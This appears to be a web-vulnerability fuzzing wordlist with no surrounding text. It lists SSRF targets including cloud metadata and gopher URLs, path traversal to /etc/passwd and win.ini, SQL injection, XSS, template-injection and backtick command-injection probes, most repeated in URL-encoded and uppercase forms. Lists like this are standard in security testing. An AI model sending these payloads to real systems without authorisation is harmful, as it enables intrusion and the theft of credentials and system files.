http://127.0.0.1
http://localhost
http://169.254.169.254/latest/meta-data/
http://[::1]
file:///etc/passwd
gopher://127.0.0.1:80/_GET%20/%20HTTP/1.1
http://0.0.0.0
http://2130706433
test
baseline
AUROSE_PROBE
../../../../etc/passwd
..\..\..\..\windows\win.ini
' OR '1'='1
" OR "1"="1
<script>alert(1)</script>
${7*7}
{{7*7}}
`id`
127.0.0.1
https://example.com
http%3A%2F%2F127.0.0.1
http%3A%2F%2Flocalhost
http%3A%2F%2F169.254.169.254%2Flatest%2Fmeta-data%2F
http%3A%2F%2F%5B%3A%3A1%5D
file%3A%2F%2F%2Fetc%2Fpasswd
gopher%3A%2F%2F127.0.0.1%3A80%2F_GET%2520%2F%2520HTTP%2F1.1
http%3A%2F%2F0.0.0.0
http%3A%2F%2F2130706433
..%2F..%2F..%2F..%2Fetc%2Fpasswd
..%5C..%5C..%5C..%5Cwindows%5Cwin.ini
%27%20OR%20%271%27%3D%271
%22%20OR%20%221%22%3D%221
%3Cscript%3Ealert%281%29%3C%2Fscript%3E
%24%7B7%2A7%7D
%7B%7B7%2A7%7D%7D
%60id%60
https%3A%2F%2Fexample.com
HTTP://127.0.0.1
HTTP://LOCALHOST
HTTP://169.254.169.254/LATEST/META-DATA/
HTTP://[::1]
FILE:///ETC/PASSWD
GOPHER://127.0.0.1:80/_GET%20/%20HTTP/1.1
HTTP://0.0.0.0
HTTP://2130706433
TEST
BASELINE
../../../../ETC/PASSWD
..\..\..\..\WINDOWS\WIN.INI
<SCRIPT>ALERT(1)</SCRIPT>
`ID`
HTTPS://EXAMPLE.COM
HTTP%3A%2F%2F127.0.0.1
HTTP%3A%2F%2FLOCALHOST
HTTP%3A%2F%2F169.254.169.254%2FLATEST%2FMETA-DATA%2F
HTTP%3A%2F%2F%5B%3A%3A1%5D
FILE%3A%2F%2F%2FETC%2FPASSWD
GOPHER%3A%2F%2F127.0.0.1%3A80%2F_GET%2520%2F%2520HTTP%2F1.1
HTTP%3A%2F%2F0.0.0.0
HTTP%3A%2F%2F2130706433
..%2F..%2F..%2F..%2FETC%2FPASSWD
..%5C..%5C..%5C..%5CWINDOWS%5CWIN.INI
%3CSCRIPT%3EALERT%281%29%3C%2FSCRIPT%3E
%60ID%60
HTTPS%3A%2F%2FEXAMPLE.COM
' OR '1'%3D'1
" OR "1"%3D"1
http://127.0.0.1?v=0
http://127.0.0.1&v=0
http%3A%2F%2F127.0.0.1_0
ssrf_0
/ssrf/0
http://127.0.0.1%0a0
http://localhost?v=1
http://localhost&v=1
http%3A%2F%2Flocalhost_1
ssrf_1
/ssrf/1
http://localhost%0a1
